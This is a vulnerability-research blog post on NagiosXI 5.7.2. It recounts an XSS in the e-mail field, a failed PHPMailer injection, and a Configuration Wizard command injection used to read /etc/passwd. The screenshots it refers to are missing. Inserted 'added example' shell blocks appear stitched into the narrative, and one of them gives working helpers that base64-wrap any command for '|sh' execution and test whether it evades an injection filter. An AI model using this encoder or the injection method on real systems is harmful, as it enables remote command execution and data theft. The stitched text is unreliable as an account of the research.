My previous look at NagiosXI is described here [1, 2, 3], so you may already have a 'basic introduction' to the topic. Below you will find a few more details, this time for (again) the 'latest' version (5.7.2). Here we go...
This time we will start here:
As usual I tried to identify some webapp bugs like XSS (to 'start somewhere' ;)). So I started here:
I found that the 'Email Address' field is vulnerable to XSS, see below:
In the meantime I was looking for the reason in the source. This is one of the findings:
Next I watched the NagiosXI weblog console; check this out (it looks pretty familiar after the last few cases described here):
Well... ;> I started to dig a bit with this field...
After I updated my account e-mail settings I decided to send test notifications:
A few more attempts below:
...and a 'few more' (hours of) checking source and logs:
And that's how I found this file:
Now, let's parse_argv():
I was wondering whether I was even able to run "the same" command directly (using only bash) on the target server:
I was. So the reason was something inside the webapp, not the payload itself... Checking:
Here (from the bash perspective) everything looks fine. So I kept looking through more source files, GitHub links and Google results. After preparing a proper (but still bash) payload I decided to test it again using 'Send Test Notifications':
No luck (the screen from VMPlayer is the response to the bash request started from the runme.sh script).
I tried to ask ps aux for some hint(s):
After 4 days... ;] I even decided to try some strace magic:
Still nothing. During day 5 (also checking the logs from NagiosXI) I found a new hint: PHPMailer:
Ok. So, in my opinion, I wasn't able to escape from the new version of PHPMailer shipped in NagiosXI. That was the reason (but feel free to correct me (and my payload ;)) if I'm wrong).
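To make the "something inside the webapp, not the payload" point concrete, here is an added example (not NagiosXI or PHPMailer code; `mailer`, `unsafe_send`, `safe_send` and `valid_addr` are hypothetical stand-ins) showing the two ways an e-mail address can reach an MTA command and why only one of them is injectable. The stand-in `mailer` just prints its argv, one element per line, so the splitting is visible:

```shell
# Added example, not code from the post or from NagiosXI/PHPMailer.
# Stand-in for the MTA call the webapp makes: prints its argv, one per line.
mailer() { printf '%s\n' "$@"; }

# Vulnerable pattern: the address is spliced into shell text and re-parsed,
# so whitespace and shell metacharacters become extra arguments or commands
# (e.g. extra sendmail flags such as -oQ<dir> from the classic mailer bugs).
unsafe_send() { eval "mailer -f $1"; }

# Hardened (1): pass the address as a single argv element, never via a shell
# string. Even an address containing spaces or '|' stays one argument.
safe_send() { mailer -f "$1"; }

# Hardened (2): allow-list the address before it goes near any command.
# Deliberately strict (not full RFC 5322): small character set only,
# which excludes whitespace, quotes, '|', ';', '$' and backticks outright.
valid_addr() {
    printf '%s' "$1" | grep -Eq '^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$'
}

# Helper: how many argv elements the stand-in mailer received for a given
# sender function and address (3 means an injected flag got through).
argc_seen() { "$@" | wc -l | tr -d ' '; }
```

Run `argc_seen unsafe_send 'x@y.z -oQ/tmp/spool'` and `argc_seen safe_send 'x@y.z -oQ/tmp/spool'` side by side: the first yields three arguments (the injected flag became its own argv element), the second two. A mailer that both validates the address and hands it over as a single argument is what a payload like the one above runs into, regardless of how the bash part is shaped.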
A few more pages to read can be found, for example, here:
Sample logs:
BTW: you can also (re)send your 'emails' (payloads) using 'My Scheduled Reports'; check it out:
A few more example logs:
At this stage (day 6 ;]) I decided to leave it like this and move on to the next (possible) bug (I'd find). That's how I landed in one of the available Configuration Wizards:
I decided to give it a try (and prepare a similar payload):
As you can see (last line on the screen above) there is an echo output ;D of the command we tried to use. ;] Great, let's try one more time:
This time we should be here:
Ok, again:
[; I think we're already there... ;] Checking:
(Yep, I saw fopen(), so I tried to read passwd ;))
Now:
Bingo! ;]
Using a few old tricks (like payload+base64+|sh) we should be somewhere around here:
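The payload+base64+|sh trick, as an added helper (not code from the post): the injection point only has to survive the characters of the wrapper itself, while the real command with its quotes, slashes, redirects and pipes travels inside the base64 blob. The caveat a practitioner wants: the base64 alphabet itself contains `+`, `/` and `=`, so check the wrapper against the characters the sink is known to strip before sending it. `b64_wrap` and `survives_filter` are hypothetical names.

```shell
# Added example, not code from the post. Assumes 'base64' and 'sh' on the target.

# Encode CMD into a one-liner that decodes and runs it.
b64_wrap() {
    enc=$(printf '%s' "$1" | base64 | tr -d '\n')
    printf 'echo %s|base64 -d|sh' "$enc"
}

# Pre-flight check: true if WRAPPER contains none of the characters in BAD
# (a string of characters the vulnerable sink strips or rejects).
# Note that base64 output may contain '+', '/' and '=', and the wrapper has
# one space and a '-' in 'base64 -d'; if any of those are filtered, this
# returns false and a different encoding (e.g. hex) is needed.
survives_filter() {
    [ -z "$(printf '%s' "$1" | tr -d -c "$2")" ]
}
```

Usage: `b64_wrap 'cat /etc/passwd | grep root'` prints the one-liner; `survives_filter "$(b64_wrap id)" "'\"/;"` tells you whether it would get through a filter that drops quotes, slashes and semicolons.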
I think we'll stop here.
Special thanks go to my Patreon supporter, Daniel.
Thanks! You are awesome! ;)
See you next time!